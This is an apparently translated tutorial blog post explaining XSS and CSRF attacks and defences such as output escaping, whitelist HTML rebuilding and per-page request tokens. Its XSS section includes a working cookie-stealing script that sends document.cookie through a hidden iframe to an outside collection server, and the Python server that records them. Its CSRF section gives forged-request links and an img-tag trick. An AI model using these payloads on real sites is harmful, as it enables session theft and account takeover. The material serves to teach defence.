
A summary of two cross-site attacks: XSS and CSRF

Author: Get started with cybersecurity

XSS: Cross-site scripting

CSRF: Cross-site request forgery

In the early days, applications built dynamic SQL statements by concatenating strings, so SQL injection became a popular attack. Today parameterized queries are commonplace, and SQL injection is far behind us. But XSS and CSRF, which are just as old, are still very much with us. Because I was already familiar with XSS, I have always been very careful with user-supplied data: if I don't filter it through Tidy or a similar library on input, I always escape all of it when the template renders the output. So for me personally, XSS is easy to avoid; the key is to be "careful." Recently, however, I heard about another cross-site attack, CSRF, so I looked up some material to understand it and compared it with XSS.
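To make the contrast concrete, here is a minimal sketch using Python's built-in sqlite3 module; the users table, its rows, and the payload are made up for illustration. With concatenation the payload rewrites the query itself, while a parameterized query treats the same payload purely as data.

```python
import sqlite3


def make_db():
    # Hypothetical in-memory table for the demonstration.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "a-secret"), ("bob", "b-secret")])
    return db


def find_by_concatenation(db, name):
    # Vulnerable: the user input becomes part of the SQL text.
    sql = "SELECT secret FROM users WHERE name = '" + name + "'"
    return [row[0] for row in db.execute(sql)]


def find_parameterized(db, name):
    # Safe: the driver passes `name` as a value, never as SQL.
    sql = "SELECT secret FROM users WHERE name = ?"
    return [row[0] for row in db.execute(sql, (name,))]


db = make_db()
payload = "x' OR '1'='1"
print(find_by_concatenation(db, payload))  # every secret leaks
print(find_parameterized(db, payload))     # []
```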

XSS: An uninvited guest in a script

XSS, short for "cross-site scripting," is a type of injection attack. Its distinguishing feature is that it does no direct harm to the server; instead, the attacker uses the site's normal interaction channels, such as posting comments, to submit text that contains JavaScript. If the server neither filters nor escapes these scripts, they are published to the page as content, and other users run them when they visit the page.
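The root cause fits in a few lines of Python. The function below is a hypothetical comment-page renderer (not taken from any real framework) that pastes user text straight into HTML, so a submitted script tag reaches every visitor's browser intact.

```python
def render_comments_unsafe(comments):
    """Hypothetical renderer: inserts each comment into the page verbatim."""
    items = "".join("<li>" + c + "</li>" for c in comments)
    return "<ul>" + items + "</ul>"


page = render_comments_unsafe(["Nice post!", '<script>alert("XSS")</script>'])
print(page)
# <ul><li>Nice post!</li><li><script>alert("XSS")</script></li></ul>
```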

Running unexpected scripts can have many consequences. It might be a simple prank, such as a window that can never be closed:

```javascript
while (true) {
    alert("You can't close me~");
}
```

It can also be account theft or some other unauthorized operation. Let's simulate the process. First, set up a server to collect the information:

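```python
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Information-collection server for cross-site scripting (XSS) injection
"""
import sqlite3

import bottle
import bottle.ext.sqlite  # requires the bottle-sqlite plugin package

app = bottle.Bottle()
# Assumes the table exists: CREATE TABLE myxss (cookies TEXT)
plugin = bottle.ext.sqlite.Plugin(dbfile='/var/db/myxss.sqlite')
app.install(plugin)


# The injected script appends the victim's cookies to this URL path.
@app.route('/myxss/<cookies:path>')
def show(cookies, db):
    SQL = 'INSERT INTO "myxss" ("cookies") VALUES (?)'
    try:
        db.execute(SQL, (cookies,))  # parameters must be a sequence
    except sqlite3.Error:
        pass
    return ""


if __name__ == "__main__":
    app.run(host="0.0.0.0", port=80)  # matches xssURIBase in the injected script
```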

Then inject this code into a comment on a page:

```javascript
// Wrap this in <script type="text/javascript"></script> and post it as a comment
(function(window, document) {
    // Build the URL used to leak the information
    var cookies = document.cookie;
    var xssURIBase = "http://192.168.123.123/myxss/";
    var xssURI = xssURIBase + window.encodeURI(cookies);
    // Create a hidden iframe for communication
    var hideFrame = document.createElement("iframe");
    hideFrame.height = 0;
    hideFrame.width = 0;
    hideFrame.style.display = "none";
    hideFrame.src = xssURI;
    // Go
    document.body.appendChild(hideFrame);
})(window, document);
```

Now everyone who visits the page containing this comment is in trouble. Without their knowledge, their browser quietly sends a request they cannot see, and that request carries their account credentials and other private information to the collection server.

As we know, the XMLHttpRequest object used by AJAX is restricted by the browser to URLs under the current domain; this is the well-known "cross-domain" restriction. The restriction also helps against XSS to some degree, but it is not always effective: as the injected code above shows, an iframe achieves the same goal, and if I wanted to, I could even send a POST request through an iframe. Of course, some browsers, such as recent versions of Firefox and Chrome, can now detect and block certain XSS attacks. But interception does not always work, and plenty of users in the world don't even know what a browser is and still use the dreaded IE6. In principle, we should not leave security to the browser, so the fundamental way to prevent XSS is to filter user input. User input is never trustworthy; every web developer should take that as common knowledge.

As mentioned above, if we don't need users to enter HTML and only want plain text, escaping all user input on HTML output is a good approach. Many authors of web frameworks and template engines seem to have realized this too: Django's built-in templates and Jinja2 templates escape output variables by default. If we don't use them, we can escape output ourselves. PHP has the htmlspecialchars function, and Python has the cgi.escape function in the cgi module (in Python 3, use html.escape instead; cgi.escape was removed in Python 3.8). Any template engine you use is bound to offer a convenient escape method.
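A minimal sketch of the do-it-yourself route in Python 3, using the standard library's html.escape; render_comments_escaped is a hypothetical helper. Once &, <, > and quotes become entities, the injected script is displayed as text instead of being executed.

```python
import html


def render_comments_escaped(comments):
    # html.escape converts &, < and >, and with quote=True (the default)
    # also " and ', so user text can no longer open tags or attributes.
    items = "".join("<li>" + html.escape(c) + "</li>" for c in comments)
    return "<ul>" + items + "</ul>"


print(render_comments_escaped(['<script>alert("XSS")</script>']))
# <ul><li>&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;</li></ul>
```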

The real trouble is that in some cases we must allow users to enter HTML while filtering out any scripts in it. HTML cleanup libraries such as Tidy can help, but only if we use them carefully. Crudely removing script tags is useless, because any legitimate HTML tag can carry an event attribute such as onclick that executes JavaScript. For complex cases I prefer a simple method: rebuilding from a whitelist. The HTML a user enters may have a complex structure, but instead of storing it in the database directly, we use an HTML parsing library to traverse the nodes and extract their data (we use an HTML parser rather than an XML parser because HTML parsing requires strong fault tolerance). We then rebuild the HTML element tree from the user's original tags and attributes, taking every tag and attribute only from the whitelist during construction. This means that if some of the user's complex input is not recognized by the parser (as noted, HTML, unlike XML, requires strong fault tolerance), it still cannot slip through the net, because the whitelist strategy simply discards whatever it does not recognize. The result is a brand-new HTML element tree, and we can rest assured that every tag and attribute in it comes from the whitelist and nothing has been missed.
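The whitelist-rebuilding idea can be sketched with Python's standard html.parser module in place of Tidy. The allowed tags and attributes, the URL prefix check, and the class and function names are illustrative assumptions, not the author's code.

```python
from html import escape
from html.parser import HTMLParser

# Hypothetical whitelist: allowed tags mapped to their allowed attributes.
ALLOWED = {"p": set(), "b": set(), "i": set(), "br": set(), "a": {"href"}}
VOID_TAGS = {"br"}                    # tags that never get a closing tag
DROP_CONTENT = {"script", "style"}    # discard these tags and their text
SAFE_URL_PREFIXES = ("http://", "https://", "/")


class WhitelistRebuilder(HTMLParser):
    """Rebuilds fresh HTML using only whitelisted tags and attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []        # pieces of the rebuilt HTML
        self.open_tags = []  # whitelisted tags opened so far
        self.skip = 0        # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip += 1
            return
        if tag not in ALLOWED:
            return  # unknown tag: drop it, keep its (escaped) text
        kept = []
        for name, value in attrs:
            if name not in ALLOWED[tag] or value is None:
                continue  # onclick and every other non-whitelisted attribute
            if name == "href" and not value.strip().lower().startswith(SAFE_URL_PREFIXES):
                continue  # e.g. javascript: URLs
            kept.append(' %s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif tag in self.open_tags:
            # Close everything opened after `tag`, then `tag` itself.
            while self.open_tags:
                t = self.open_tags.pop()
                self.out.append("</%s>" % t)
                if t == tag:
                    break

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data))


def sanitize(user_html):
    parser = WhitelistRebuilder()
    parser.feed(user_html)
    parser.close()  # flush any buffered text
    # Close tags the user left open so the output is well-formed.
    tail = "".join("</%s>" % t for t in reversed(parser.open_tags))
    return "".join(parser.out) + tail


print(sanitize('<p onclick="evil()">Hi <b>there</b><script>alert(1)</script></p>'))
# <p>Hi <b>there</b></p>
```

Design note: unrecognized tags are dropped but their text survives (escaped), script and style content is discarded entirely, and every emitted attribute value is re-escaped, so nothing reaches the output that was not rebuilt from the whitelist.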

Most web developers now seem to understand XSS and know how to prevent it, and large-scale XSS attacks (including the recent XSS injection on Sina Weibo) usually come from oversights. For web projects that use a template engine, I recommend turning on (or not turning off) auto-escaping, as provided by Django templates and Jinja2. Where escaping is genuinely not wanted, we can explicitly disable it for that one spot. This whitelist-style approach (escape everything by default, exempt only what we explicitly mark) helps reduce the risk of leaving XSS holes through oversight.
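The "escape by default, opt out explicitly" policy can be illustrated with a toy renderer. This is not the Django or Jinja2 API; the Safe marker class and the render function are hypothetical, loosely modeled on the way those engines mark trusted strings.

```python
import html


class Safe(str):
    """Hypothetical marker: a string the developer vouches for as HTML."""


def render(template, **values):
    # Escape every value by default; only values explicitly wrapped in
    # Safe are inserted as-is (the whitelist of unescaped output).
    cooked = {
        name: value if isinstance(value, Safe) else html.escape(str(value))
        for name, value in values.items()
    }
    return template.format(**cooked)


print(render("<p>{comment}</p>{footer}",
             comment="<script>alert(1)</script>",
             footer=Safe("<hr>")))
# <p>&lt;script&gt;alert(1)&lt;/script&gt;</p><hr>
```

Forgetting to mark something as Safe only produces visible entities, which is an easy bug to spot; forgetting to escape is the silent, dangerous one, which is why the default belongs on the escaping side.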

Another high-risk area is rich AJAX applications (such as Douban's Alpha City). In such applications the risk does not lie mainly in static HTTP response content, so turning on template auto-escaping does not solve the problem once and for all. And because these applications often need cross-domain access, developers have to open dangerous doors themselves. Here the site's security relies heavily on the developers' care and on effective testing before the application goes live. There are also many open-source XSS vulnerability testing packages (I seem to recall an article mentioning that Douban's developers use automated XSS testing), but I haven't tried them, so I won't evaluate them. In any case, I think getting things right at the point where user input enters is always the cheapest and most effective approach.

CSRF: Impersonating the user

At first I couldn't figure out exactly how CSRF differs from XSS, but then I realized that the two terms classify attacks along different dimensions. XSS is one of many ways to carry out CSRF, but definitely not the only one. Some people call CSRF carried out through XSS "XSRF", although XSRF is also widely used simply as another abbreviation for CSRF.

The full name of CSRF is "cross-site request forgery", while the full name of XSS is "cross-site scripting". The names look somewhat alike, and both belong to the category of cross-site attacks: they target users who are visiting a website normally rather than attacking the server itself. But, as mentioned earlier, the two names classify attacks along different dimensions. CSRF, as the name suggests, forges requests that impersonate the user's normal actions on the site. The vast majority of websites identify users through cookies or similar means (this includes sites that use server-side Sessions, since Session IDs are also mostly stored in cookies) and then authorize them. Therefore, the best way to fake the user's normal actions is to use XSS or a deceptive link to make the user, on their own machine (that is, the browser holding the identity cookie), send a request they are unaware of.

Strictly speaking, CSRF cannot be classified as an injection attack, because there are many more ways to carry it out than XSS injection. CSRF is easy to implement with XSS, but on a poorly designed website even an ordinary link can trigger it.

For example, suppose a forum creates posts through GET requests: after the user clicks Post, JavaScript concatenates the post content into a target URL and requests it:

http://example.com/bbs/create_post.php?title=Title&content=Content

Then all I need to do is publish a post on the forum containing this link:

http://example.com/bbs/create_post.php?title=I'm+brain+dead&content=haha

As soon as someone clicks the link, their account publishes that post without their knowledge. This may be just a prank, but if the request to create a post can be forged, so can requests to delete posts, transfer money, change passwords, and send email.
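A minimal Python sketch of why this works. The in-memory session table, the create_post handler, and its parameters are hypothetical stand-ins for the forum's create_post.php. The handler trusts the session cookie alone and never checks how the request was made, so a link clicked by the victim looks exactly like the forum's own JavaScript.

```python
from urllib.parse import parse_qs, urlsplit

# Hypothetical server state: session id -> user name, and the forum's posts.
SESSIONS = {"sess-123": "alice"}
POSTS = []


def create_post(method, url, cookies):
    """Vulnerable sketch: `method` is never checked, and the session
    cookie is the only proof of who is asking."""
    user = SESSIONS.get(cookies.get("session_id"))
    if user is None:
        return 401
    query = parse_qs(urlsplit(url).query)
    POSTS.append((user, query["title"][0], query["content"][0]))
    return 200


# Alice clicks the attacker's link; her browser attaches her cookie as usual.
forged = "http://example.com/bbs/create_post.php?title=I'm+brain+dead&content=haha"
print(create_post("GET", forged, {"session_id": "sess-123"}))  # 200
print(POSTS)  # [('alice', "I'm brain dead", 'haha')]
```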

How do we solve this problem? Can we follow the XSS approach above, filtering user input and refusing to let users post links that point to the site's action URLs? That may help a little, but it will not stop CSRF, because an attacker can publish the link through QQ or other websites and, as a disguise, may even shorten the URL with bit.ly, so users who click it will still fall into the trap. So we need to look at CSRF from a different angle than XSS. CSRF does not require any input on the site, because it is not an injection attack but request forgery. A forged request can come from anywhere, not necessarily from our site. So the only place we can act is the handler that processes the request.

The headache is that requests can come from anywhere and be initiated in many different ways: through an iframe, through AJAX (which cannot cross domains, so this route requires XSS), or from inside Flash (always a big hidden danger). Since there is almost no way to eliminate CSRF completely, the usual practice is to raise the bar for attackers in a variety of ways.

The first bar we can raise is the design of the site's API. Operations that create resources, such as publishing posts, should accept only POST requests, while GET requests should only browse and never change server-side resources. Ideally, we would use a REST-style API design, where the four request methods GET, POST, PUT, and DELETE correspond to reading, creating, modifying, and deleting a resource. Today's browsers basically do not support PUT and DELETE in HTML forms, so we can either submit requests via AJAX (for example through the jQuery Form plugin, my favorite approach) or specify the request method in a hidden field and use POST to simulate PUT and DELETE (as Ruby on Rails does). This way the different resource operations are clearly separated, and we narrow the problem to non-GET requests. Attackers can no longer forge requests just by posting links, but they can still publish forms, or place forms invisible to the naked eye on other sites and submit them with JavaScript in the background.
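A minimal sketch of the method split in Python. The dispatcher, the routes table, and the handlers are hypothetical; the _method override mirrors the hidden-field convention described above for Ruby on Rails, but it is not Rails' code.

```python
OVERRIDABLE = {"PUT", "DELETE"}


def effective_method(method, form):
    """Rails-style override: a POST may carry a hidden _method field."""
    override = form.get("_method", "").upper()
    if method == "POST" and override in OVERRIDABLE:
        return override
    return method


def dispatch(method, form, handlers):
    # Each HTTP method maps to exactly one operation on the resource.
    handler = handlers.get(effective_method(method, form))
    if handler is None:
        return 405, "Method Not Allowed"
    return handler(form)


# Hypothetical handlers for a "posts" resource; GET is read-only.
routes = {
    "GET": lambda form: (200, "list posts"),
    "POST": lambda form: (201, "created " + form["title"]),
    "PUT": lambda form: (200, "updated " + form["title"]),
    "DELETE": lambda form: (204, ""),
}

# A forged GET link can only read; it never reaches the create handler.
print(dispatch("GET", {"title": "I'm brain dead"}, routes))  # (200, 'list posts')
print(dispatch("POST", {"title": "Hello"}, routes))          # (201, 'created Hello')
print(dispatch("POST", {"_method": "DELETE"}, routes))       # (204, '')
print(dispatch("PATCH", {}, routes))                         # (405, 'Method Not Allowed')
```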

Next, we can use a simpler and more effective defense against CSRF, called a "request token". Readers of Core J2EE Patterns will be familiar with the "Synchronizer Token". A request token works on the same principle but serves a different purpose: the Synchronizer Token solves the problem of duplicate form submissions, while the request token ensures that a received request really comes from the expected page. The implementation is very simple. First, the server generates a random string according to some strategy to serve as the token, and saves it in the Session. Then, on the page that makes the request, the token is sent along with the other form data in a hidden field. On the page that receives the request, the server compares the submitted token with the one in the Session and processes the request only if they match; otherwise it returns HTTP 403 Forbidden or asks the user to log in again to verify their identity.
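A minimal sketch of this flow in Python, with a plain dict standing in for the server-side Session. The csrf_token field name and the two helper functions are hypothetical; secrets.token_urlsafe supplies the random string, and hmac.compare_digest performs a constant-time comparison.

```python
import hmac
import secrets
from html import escape


def issue_token(session):
    """Generate a random token, keep it in the Session, return a hidden field."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return '<input type="hidden" name="csrf_token" value="%s">' % escape(token)


def check_token(session, form):
    """Return 200 if the submitted token matches the Session's, else 403."""
    expected = session.get("csrf_token")
    submitted = form.get("csrf_token", "")
    if expected is None or not hmac.compare_digest(expected.encode(),
                                                   submitted.encode()):
        return 403
    return 200


session = {}  # stands in for the server-side Session
hidden_field = issue_token(session)  # embedded in the form the server renders
print(check_token(session, {"csrf_token": session["csrf_token"], "title": "hi"}))  # 200
print(check_token(session, {"title": "forged"}))  # 403
```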

Although the request token is simple to use, it is not unbreakable, and improper use will increase security risks. There are a few things to note about using request tokens to prevent CSRF:

  • Although request tokens work on a principle similar to CAPTCHAs, they should not share one global Session Key the way a CAPTCHA might. Request tokens can in theory be cracked, by parsing the text of the source page to extract the token. If a single Session Key is used globally, the risk rises. In principle, each page's request token should be stored under its own Session Key. When designing the server side, we can wrap this up a little: write a small token toolkit that uses the page's identity as the key for storing its token in the Session.
  • In applications that make heavy use of AJAX, requests are initiated by JavaScript, so outputting the token value through a static template is somewhat inconvenient. Even so, never provide an API that returns the token value directly. Doing so is like locking the door and then leaving the key on the doorstep, degrading our request token into a mere synchronizer token.
  • The first point notes that request tokens can in theory be cracked, so for very important operations consider using a CAPTCHA (an upgraded token that is currently extremely hard to crack) or requiring the user to re-enter their password (as Amazon and Taobao do). Neither option offers a good user experience, though, so product designers need to weigh the trade-off.
  • Whether it is an ordinary request token or a CAPTCHA, the server must destroy it after verification. Forgetting to destroy used tokens is a very elementary but extremely damaging mistake. Our school's course selection system had exactly this problem: CAPTCHAs were not destroyed after use, so once you obtained a CAPTCHA image, its code could be reused across many requests (as long as you did not reload the image) until the Session timed out. That is why, even after the course selection system added a CAPTCHA, the course-grabbing plug-ins kept working after just one update.
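The first and last points (one Session key per page, and destroy each token once it has been checked) can be sketched as a tiny token toolkit. The key format, the page identifiers, and the function names are hypothetical.

```python
import hmac
import secrets


def _session_key(page_id):
    # One Session entry per page instead of one global token key.
    return "csrf_token:" + page_id


def issue_page_token(session, page_id):
    token = secrets.token_urlsafe(32)
    session[_session_key(page_id)] = token
    return token


def consume_page_token(session, page_id, submitted):
    # pop() destroys the stored token as soon as it is checked, so a token
    # captured once cannot be replayed until the Session expires.
    expected = session.pop(_session_key(page_id), None)
    if expected is None or submitted is None:
        return False
    return hmac.compare_digest(expected.encode(), submitted.encode())


session = {}  # stands in for the server-side Session
issue_page_token(session, "/bbs/new_post")
pwd_token = issue_page_token(session, "/account/password")
print(consume_page_token(session, "/bbs/new_post", pwd_token))   # False: another page's token
post_token = issue_page_token(session, "/bbs/new_post")          # form rendered again
print(consume_page_token(session, "/bbs/new_post", post_token))  # True
print(consume_page_token(session, "/bbs/new_post", post_token))  # False: already destroyed
```

This sketch destroys the token even when the check fails, so a forged request also invalidates the genuine form and the user has to reload it. Destroying the token only on success would avoid that inconvenience; which to prefer is a judgment call.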

Here are some practices that are said to be effective against CSRF, but are actually ineffective.

  • Checking the Referer to determine the source page: the Referer is an HTTP request header, so it is determined by whoever sends the request. If I feel like it, I can give the Referer any value. This practice is not entirely useless, since it can at least stop novices, but I think its cost-effectiveness is lower than that of a token.
  • Filtering all links posted by users: this is the least effective approach, because the attacker does not have to send the request from our site at all (as mentioned above), and even when the request does come from our site, links are far from the only way. For example, <img src="./create_post.php" /> works nicely and does not even require a click: as soon as the user's browser loads the image, the request is sent automatically.
  • Alerting the user with a pop-up on the page that initiates the request: this seems to interfere with CSRF launched from an off-site iframe, but an attacker can silence the alert with window.alert = function(){};, or simply abandon the iframe and use Flash instead.

In general, few of the current CSRF defenses are completely unbreakable. That is why articles about CSRF on CSDN usually describe it as "shameless" (the other attack given that label seems to be DDoS). As developers, all we can do is make attacks as hard as possible. When the difficulty reaches a certain level, the website approaches absolute safety (although it can never reach it). In my view, the request token method above is the most extensible, because its principle is the direct counterpart of CSRF's. What makes CSRF hard to defend against is that, on the server side, forged requests and normal requests are essentially identical. The request token singles out the one thing that does differ: the page the request comes from. We can go further, for example by making the token's key in the page dynamic, to raise the bar for attackers even more. This article only summarizes my personal understanding, so I won't go into more depth.
